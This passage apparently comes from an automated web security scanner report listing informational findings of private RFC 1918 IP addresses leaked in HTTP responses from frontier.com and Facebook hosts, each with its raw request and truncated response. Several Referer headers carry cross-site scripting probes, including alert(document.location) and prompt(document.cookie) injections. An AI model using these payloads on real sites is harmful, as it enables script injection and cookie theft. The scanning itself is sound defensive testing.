ETag: "7023584be74acc1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:09 GMT

......JFIF.....H.H.....C...........    ...    .......

.

........................... ...C.............. ......3...................................
...[SNIP]...

19.30. http://frontier.com/images/FTRMain/gradientBox.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /images/FTRMain/gradientBox.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/FTRMain/gradientBox.png HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8827CMWWM; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 35375
Content-Type: image/png
Last-Modified: Thu, 12 May 2011 10:59:50 GMT
Accept-Ranges: bytes
ETag: "6227d5b69310cc1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:55 GMT

.PNG
.
...IHDR.............I..H...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

19.31. http://frontier.com/images/FTRMain/small_arrow.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /images/FTRMain/small_arrow.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/FTRMain/small_arrow.png HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8827CMWYI; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 168
Content-Type: image/png
Last-Modified: Mon, 25 Jul 2011 16:24:14 GMT
Accept-Ranges: bytes
ETag: "24e85c4be74acc1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:08 GMT

.PNG
.
...IHDR.............B.%}....tEXtSoftware.Adobe ImageReadyq.e<...JIDATx.bdh\P...........`.........$..g...    H...t...Q$..=..8F..F..4...i@.@...?..Uy.......IEND.B`.

19.32. http://frontier.com/images/icon_print.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /images/icon_print.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/icon_print.gif HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8827CMWWO; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 107
Content-Type: image/gif
Last-Modified: Thu, 05 Apr 2007 14:26:24 GMT
Accept-Ranges: bytes
ETag: "603f7b638e77c71:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:53 GMT

GIF89a.............fff333!.......,........@.<...6....J.9$.w.diS.)...*.)......"@....xY..P8."skmp.....:..E..;

19.33. http://frontier.com/js/jquery/jquery.numeric.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /js/jquery/jquery.numeric.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/jquery/jquery.numeric.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 3790
Content-Type: application/x-javascript
Last-Modified: Thu, 29 Jul 2010 19:17:28 GMT
Accept-Ranges: bytes
ETag: "094ffae522fcb1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:53 GMT

/*
*
* Copyright (c) 2006/2007 Sam Collett (http://www.texotela.co.uk)
* Licensed under the MIT License:
* http://www.opensource.org/licenses/mit-license.php
*
* Version 1.0
* Demo: htt
...[SNIP]...

19.34. http://static.ak.fbcdn.net/connect.php/js/FB.Share  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect.php/js/FB.Share

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/js/FB.Share HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://l.yimg.com/p/social_buttons/facebook-share-iframe.php?u=http%3A%2F%2Fnew.music.yahoo.com%2Fblogs%2Flive%2F13348%2Fred-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video%2F&t=Red%20Hot%20Chili%20Peppers%20Exclusive%20Interview!%20New%20Album,%20New%20Member,%20New%20Video%20-%20Maximum%20Performance&l=Share&t_sec=mit_share&t_act=facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
ETag: "64bd627bb6f1eb7845f4f8e6db00b15e"
Vary: Accept-Encoding
Content-Type: application/x-javascript; charset=utf-8
X-FB-Server: 10.64.223.51
X-Cnection: close
Content-Length: 6585
Cache-Control: public, max-age=1082
Expires: Tue, 06 Sep 2011 13:07:44 GMT
Date: Tue, 06 Sep 2011 12:49:42 GMT
Connection: close

/*1315005401,172023603,JIT Construction: v434551,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

19.35. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=117892634961387&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df350110394%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fservicetips.whitefence.com%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.148.189
X-Cnection: close
Content-Length: 2481
Vary: Accept-Encoding
Cache-Control: public, max-age=12022
Expires: Tue, 06 Sep 2011 15:20:03 GMT
Date: Tue, 06 Sep 2011 11:59:41 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.36. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=like&api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df2d89b260c%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=arial&href=http%3A%2F%2Fsports.yahoo.com%2Fmlb%2Frecap%3Fgid%3D310905122&layout=button_count&locale=en_us&node_type=link&sdk=joey&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.145.195
X-Cnection: close
Content-Length: 2481
Vary: Accept-Encoding
Cache-Control: public, max-age=9114
Expires: Tue, 06 Sep 2011 15:22:24 GMT
Date: Tue, 06 Sep 2011 12:50:30 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.37. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=like&api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df3647379a8%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=arial&href=http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2FTiki-Barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443&layout=button_count&locale=en_us&node_type=link&sdk=joey&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.145.199
X-Cnection: close
Content-Length: 2481
Vary: Accept-Encoding
Cache-Control: public, max-age=9392
Expires: Tue, 06 Sep 2011 15:21:51 GMT
Date: Tue, 06 Sep 2011 12:45:19 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.38. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df22119cc94%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df2803b0c5c%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3abb1fdbc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df246c4d738%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3abb1fdbc%26result%3DxxRESULTTOKENxx&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df3587aa258%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3abb1fdbc%26result%3DxxRESULTTOKENxx&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df11f62758%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3abb1fdbc%26result%3DxxRESULTTOKENxx&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.128.47
X-Cnection: close
Date: Tue, 06 Sep 2011 12:46:07 GMT
Content-Length: 271

<script type="text/javascript">
parent.postMessage("?=&cb=f3587aa258&origin=http\u00253A\u00252F\u00252Fsports.yahoo.com\u00252Ff27ad894f4&relation=parent&transport=postmessage&frame=f3abb1fdbc&result
...[SNIP]...

19.39. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df2cd8b2c5%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df247f280f4%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df71e2b9b8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df2c9df72fc%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df71e2b9b8%26result%3DxxRESULTTOKENxx&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Dfcb7b3804%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df71e2b9b8%26result%3DxxRESULTTOKENxx&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df86ea4bb4%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df71e2b9b8%26result%3DxxRESULTTOKENxx&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.135.41
X-Cnection: close
Date: Tue, 06 Sep 2011 12:44:56 GMT
Content-Length: 269

<script type="text/javascript">
parent.postMessage("?=&cb=fcb7b3804&origin=http\u00253A\u00252F\u00252Fsports.yahoo.com\u00252Ff3b0d7c228&relation=parent&transport=postmessage&frame=f71e2b9b8&result=x
...[SNIP]...

19.40. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=210163452329780&app_id=210163452329780&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a19dedf9b9f58%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff34bd257aa0cfc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13cc7cce322034%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff34bd257aa0cfc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38909eb3473868%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11b4e66cf613ae%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff34bd257aa0cfc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38909eb3473868&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df139aca019d0d4a%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff34bd257aa0cfc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38909eb3473868&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df207c180db41b1a%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff34bd257aa0cfc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38909eb3473868&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss%003d6ce%27%3balert(1)//9336b0fa1c5
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.108.63
X-Cnection: close
Date: Tue, 06 Sep 2011 12:55:37 GMT
Content-Length: 259

<script type="text/javascript">
parent.postMessage("cb=f139aca019d0d4a&origin=http\u00253A\u00252F\u00252Fwww.myfitv.com\u00252Ff34bd257aa0cfc&relation=parent&transport=postmessage&frame=f38909eb34738
...[SNIP]...

19.41. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df156aa52c%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Dfbe4c1258%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d97d5ac4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df2793c1f%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d97d5ac4%26result%3DxxRESULTTOKENxx&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df2452a6c9c%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d97d5ac4%26result%3DxxRESULTTOKENxx&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Dff3bb775%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d97d5ac4%26result%3DxxRESULTTOKENxx&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.165.45
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:05 GMT
Content-Length: 271

<script type="text/javascript">
parent.postMessage("?=&cb=f2452a6c9c&origin=http\u00253A\u00252F\u00252Fsports.yahoo.com\u00252Ff3b0d7c228&relation=parent&transport=postmessage&frame=f1d97d5ac4&result
...[SNIP]...

19.42. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=210163452329780&app_id=210163452329780&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f7311028a994a%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff30d33915dc2dca%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b9737aad60de%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff30d33915dc2dca%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9537b0afc7482%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc417de2e6d0cc%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff30d33915dc2dca%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9537b0afc7482&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33e27b5c130646%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff30d33915dc2dca%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9537b0afc7482&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dff9b31de9b1812%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff30d33915dc2dca%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9537b0afc7482&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss%003d6ce%27%3prompt(document.cookie)//9336b0fa1c5
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.117.41
X-Cnection: close
Date: Tue, 06 Sep 2011 12:55:23 GMT
Content-Length: 260

<script type="text/javascript">
parent.postMessage("cb=f33e27b5c130646&origin=http\u00253A\u00252F\u00252Fwww.myfitv.com\u00252Ff30d33915dc2dca&relation=parent&transport=postmessage&frame=f9537b0afc74
...[SNIP]...

19.43. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

